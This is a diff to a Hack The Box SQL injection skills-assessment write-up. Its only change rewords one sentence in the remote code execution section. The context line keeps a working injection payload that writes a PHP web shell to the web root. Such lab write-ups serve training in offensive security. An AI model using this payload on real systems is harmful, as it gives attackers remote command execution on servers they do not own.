Collinformatics/HackTheBox/SkillsAssessment/SQLInjectionFundamentals/writeup.md

 ## Remote Code Execution:

-Given that we have write permissions, let write some malicious code on the server.
+Given that we have write permissions, let have a bit of fun and write some malicious code on the server.

     ') UNION SELECT "","",'<?php system($_REQUEST[0]); ?>',"" into outfile "/var/www/chattr-prod/fSociety.php"-- -